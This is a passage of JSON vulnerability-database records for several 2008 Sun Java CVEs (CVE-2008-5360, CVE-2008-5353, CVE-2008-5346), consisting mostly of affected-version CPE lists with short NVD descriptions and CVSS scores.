"cpe:/a:sun:sdk:1.4.2_03", "cpe:/a:sun:jre:1.6.0", "cpe:/a:sun:jre:1.4.2_11", "cpe:/a:sun:jre:1.4.2_12", "cpe:/a:sun:jre:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_8", "cpe:/a:sun:sdk:1.3.1_20", "cpe:/a:sun:jre:1.3.1_14", "cpe:/a:sun:jre:1.4.2_14", "cpe:/a:sun:jre:1.4.2_18", "cpe:/a:sun:sdk:1.3.1_23", "cpe:/a:sun:sdk:1.3.1_21", "cpe:/a:sun:jre:1.3.1_07", "cpe:/a:sun:sdk:1.3.1_04", "cpe:/a:sun:jre:1.3.1_12", "cpe:/a:sun:sdk:1.3.1_09", "cpe:/a:sun:jre:1.4.2_3", "cpe:/a:sun:jre:1.3.1_22", "cpe:/a:sun:jre:1.4.2_6", "cpe:/a:sun:sdk:1.4.2_9", "cpe:/a:sun:sdk:1.3.1_17", "cpe:/a:sun:sdk:1.4.2_10", "cpe:/a:sun:sdk:1.4.2_12", "cpe:/a:sun:jre:1.3.1_21", "cpe:/a:sun:jre:1.3.1_15", "cpe:/a:sun:sdk:1.3.1_03", "cpe:/a:sun:sdk:1.3.1", "cpe:/a:sun:sdk:1.4.2_09", "cpe:/a:sun:sdk:1.3.1_01a", "cpe:/a:sun:sdk:1.3.1_11", "cpe:/a:sun:jre:1.4.2_1", "cpe:/a:sun:sdk:1.3.1_22", "cpe:/a:sun:jdk:1.5.0", "cpe:/a:sun:jre:1.5.0", "cpe:/a:sun:sdk:1.3.1_05", "cpe:/a:sun:jre:1.3.1_11", "cpe:/a:sun:jre:1.3.1_16", "cpe:/a:sun:sdk:1.4.2_7", "cpe:/a:sun:sdk:1.4.2_08", "cpe:/a:sun:jre:1.3.1_20", "cpe:/a:sun:jre:1.3.1_2", "cpe:/a:sun:sdk:1.3.1_01", "cpe:/a:sun:jre:1.3.1_10", "cpe:/a:sun:sdk:1.3.1_18", "cpe:/a:sun:sdk:1.3.1_14", "cpe:/a:sun:sdk:1.4.2_02", "cpe:/a:sun:sdk:1.4.2_13", "cpe:/a:sun:sdk:1.4.2_2", "cpe:/a:sun:jre:1.3.1", "cpe:/a:sun:sdk:1.3.1_08", "cpe:/a:sun:jre:1.3.1_13", "cpe:/a:sun:jre:1.3.1_05", "cpe:/a:sun:jre:1.4.2_15", "cpe:/a:sun:jre:1.4.2_8", "cpe:/a:sun:sdk:1.4.2_14", "cpe:/a:sun:sdk:1.4.2_04", "cpe:/a:sun:jre:1.3.1_03", "cpe:/a:sun:sdk:1.3.1_10", "cpe:/a:sun:sdk:1.4.2_17", "cpe:/a:sun:jre:1.4.2", "cpe:/a:sun:sdk:1.3.1_12", "cpe:/a:sun:jre:1.3.1_06", "cpe:/a:sun:sdk:1.4.2_16", "cpe:/a:sun:jre:1.3.1_18", "cpe:/a:sun:sdk:1.4.2_6", "cpe:/a:sun:jre:1.3.1_19", "cpe:/a:sun:jre:1.3.1_09", "cpe:/a:sun:sdk:1.4.2_18", "cpe:/a:sun:sdk:1.4.2_5", "cpe:/a:sun:jre:1.3.1_17", "cpe:/a:sun:jre:1.4.2_2", "cpe:/a:sun:sdk:1.4.2_1", "cpe:/a:sun:sdk:1.4.2_3", "cpe:/a:sun:jre:1.4.2_13", "cpe:/a:sun:sdk:1.4.2", "cpe:/a:sun:sdk:1.3.1_07", "cpe:/a:sun:sdk:1.4.2_15"], "id": "CVE-2008-5360", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5360", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}, "cpe23": ["cpe:2.3:a:sun:jre:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update11:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update15:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update15:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update11:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_23:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_23:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_01a:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:-:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:-:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update13:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update12:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update13:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update2:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update11_b03:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update10:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_6:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:28:27", "description": "The Java Runtime Environment (JRE) for Sun JDK and JRE 6 Update 10 and earlier; JDK and JRE 5.0 Update 16 and earlier; and SDK and JRE 1.4.2_18 and earlier does not properly enforce context of ZoneInfo objects during deserialization, which allows remote attackers to run untrusted applets and applications in a privileged context, as demonstrated by \"deserializing Calendar objects\".", "edition": 5, "cvss3": {}, "published": "2008-12-05T11:30:00", "title": "CVE-2008-5353", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5353"], "modified": "2018-10-11T20:55:00", "cpe": ["cpe:/a:sun:jre:1.4.2_4", "cpe:/a:sun:jre:6", "cpe:/a:sun:jre:1.4.2_17", "cpe:/a:sun:jre:1.4.2_7", "cpe:/a:sun:jre:1.4.2_10", "cpe:/a:sun:jre:1.4.2_9", "cpe:/a:sun:sdk:1.4.2_11", "cpe:/a:sun:jre:1.4.2_5", "cpe:/a:sun:sdk:1.4.2_4", "cpe:/a:sun:jre:1.4.2_11", "cpe:/a:sun:jre:1.4.2_12", "cpe:/a:sun:jre:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_8", "cpe:/a:sun:jre:1.4.2_14", "cpe:/a:sun:jre:1.4.2_18", "cpe:/a:sun:jre:1.4.2_3", "cpe:/a:sun:jre:1.4.2_6", "cpe:/a:sun:sdk:1.4.2_9", "cpe:/a:sun:sdk:1.4.2_10", "cpe:/a:sun:sdk:1.4.2_12", "cpe:/a:sun:jre:1.4.2_1", "cpe:/a:sun:sdk:1.4.2_7", "cpe:/a:sun:sdk:1.4.2_13", "cpe:/a:sun:sdk:1.4.2_2", "cpe:/a:sun:jre:1.4.2_15", "cpe:/a:sun:jre:5.0", "cpe:/a:sun:jre:1.4.2_8", "cpe:/a:sun:sdk:1.4.2_14", "cpe:/a:sun:sdk:1.4.2_17", "cpe:/a:sun:sdk:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_6", "cpe:/a:sun:jdk:5.0", "cpe:/a:sun:sdk:1.4.2_18", "cpe:/a:sun:sdk:1.4.2_5", "cpe:/a:sun:jre:1.4.2_2", "cpe:/a:sun:sdk:1.4.2_1", "cpe:/a:sun:sdk:1.4.2_3", "cpe:/a:sun:jre:1.4.2_13", "cpe:/a:sun:jdk:6", "cpe:/a:sun:sdk:1.4.2_15"], "id": "CVE-2008-5353", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5353", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:sun:jre:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_1:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:51:03", "description": "Unspecified vulnerability in Java Runtime Environment (JRE) for Sun JDK and JRE 5.0 Update 16 and earlier; SDK and JRE 1.4.2_18 and earlier; and SDK and JRE 1.3.1_23 or earlier allows untrusted applets and applications to read arbitrary memory via a crafted ZIP file.", "edition": 6, "cvss3": {}, "published": "2008-12-05T11:30:00", "title": "CVE-2008-5346", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.1, "vectorString": "AV:N/AC:M/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5346"], "modified": "2019-07-31T12:42:00", "cpe": ["cpe:/a:sun:sdk:1.3.1_15", "cpe:/a:sun:jre:1.4.2_4", "cpe:/a:sun:sdk:1.3.1_16", "cpe:/a:sun:jre:1.4.2_17", "cpe:/a:sun:sdk:1.3.1_13", "cpe:/a:sun:jre:1.4.2_7", "cpe:/a:sun:sdk:1.3.1_02", "cpe:/a:sun:jre:1.4.2_10", "cpe:/a:sun:jre:1.4.2_9", "cpe:/a:sun:jre:1.3.1_08", "cpe:/a:sun:sdk:1.3.1_19", "cpe:/a:sun:jre:1.3.1_23", "cpe:/a:sun:sdk:1.4.2_11", "cpe:/a:sun:jre:1.3.1_04", "cpe:/a:sun:sdk:1.3.1_06", "cpe:/a:sun:jre:1.4.2_5", "cpe:/a:sun:sdk:1.4.2_4", "cpe:/a:sun:sdk:1.4.2_03", "cpe:/a:sun:jre:1.4.2_11", "cpe:/a:sun:jre:1.4.2_12", "cpe:/a:sun:jre:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_8", "cpe:/a:sun:sdk:1.3.1_20", "cpe:/a:sun:jre:1.3.1_14", "cpe:/a:sun:jre:1.4.2_14", "cpe:/a:sun:jre:1.4.2_18", "cpe:/a:sun:sdk:1.3.1_23", "cpe:/a:sun:sdk:1.3.1_21", "cpe:/a:sun:jre:1.3.1_07", "cpe:/a:sun:sdk:1.3.1_04", "cpe:/a:sun:jre:1.3.1_12", "cpe:/a:sun:sdk:1.3.1_09", "cpe:/a:sun:jre:1.4.2_3", "cpe:/a:sun:jre:1.3.1_22", "cpe:/a:sun:jre:1.4.2_6", "cpe:/a:sun:sdk:1.4.2_9", "cpe:/a:sun:sdk:1.3.1_17", "cpe:/a:sun:sdk:1.4.2_10", "cpe:/a:sun:sdk:1.4.2_12", "cpe:/a:sun:jre:1.3.1_21", "cpe:/a:sun:jre:1.3.1_15", "cpe:/a:sun:sdk:1.3.1_03", "cpe:/a:sun:sdk:1.3.1", "cpe:/a:sun:sdk:1.4.2_09", "cpe:/a:sun:sdk:1.3.1_01a", "cpe:/a:sun:sdk:1.3.1_11", "cpe:/a:sun:jre:1.4.2_1", "cpe:/a:sun:sdk:1.3.1_22", "cpe:/a:sun:jdk:1.5.0", "cpe:/a:sun:jre:1.5.0", "cpe:/a:sun:sdk:1.3.1_05", "cpe:/a:sun:jre:1.3.1_11", "cpe:/a:sun:jre:1.3.1_16", "cpe:/a:sun:sdk:1.4.2_7", "cpe:/a:sun:sdk:1.4.2_08", "cpe:/a:sun:jre:1.3.1_20", "cpe:/a:sun:jre:1.3.1_2", "cpe:/a:sun:sdk:1.3.1_01", "cpe:/a:sun:jre:1.3.1_10", "cpe:/a:sun:sdk:1.3.1_18", "cpe:/a:sun:sdk:1.3.1_14", "cpe:/a:sun:sdk:1.4.2_02", "cpe:/a:sun:sdk:1.4.2_13", "cpe:/a:sun:sdk:1.4.2_2", "cpe:/a:sun:jre:1.3.1", "cpe:/a:sun:sdk:1.3.1_08", "cpe:/a:sun:jre:1.3.1_13", "cpe:/a:sun:jre:1.3.1_05", "cpe:/a:sun:jre:1.4.2_15", "cpe:/a:sun:jre:1.4.2_8", "cpe:/a:sun:sdk:1.4.2_14", "cpe:/a:sun:sdk:1.4.2_04", "cpe:/a:sun:jre:1.3.1_03", "cpe:/a:sun:sdk:1.3.1_10", "cpe:/a:sun:sdk:1.4.2_17", "cpe:/a:sun:jre:1.4.2", "cpe:/a:sun:sdk:1.3.1_12", "cpe:/a:sun:jre:1.3.1_06", "cpe:/a:sun:sdk:1.4.2_16", "cpe:/a:sun:jre:1.3.1_18", "cpe:/a:sun:sdk:1.4.2_6", "cpe:/a:sun:jre:1.3.1_19", "cpe:/a:sun:jre:1.3.1_09", "cpe:/a:sun:sdk:1.4.2_18", "cpe:/a:sun:sdk:1.4.2_5", "cpe:/a:sun:jre:1.3.1_17", "cpe:/a:sun:jre:1.4.2_2", "cpe:/a:sun:sdk:1.4.2_1", "cpe:/a:sun:sdk:1.4.2_3", "cpe:/a:sun:jre:1.4.2_13", "cpe:/a:sun:sdk:1.4.2", "cpe:/a:sun:sdk:1.3.1_07", "cpe:/a:sun:sdk:1.4.2_15"], "id": "CVE-2008-5346", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5346", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:C/I:N/A:N"}, "cpe23": ["cpe:2.3:a:sun:jre:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update11:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_10:*:*:*:*:*:*:*", 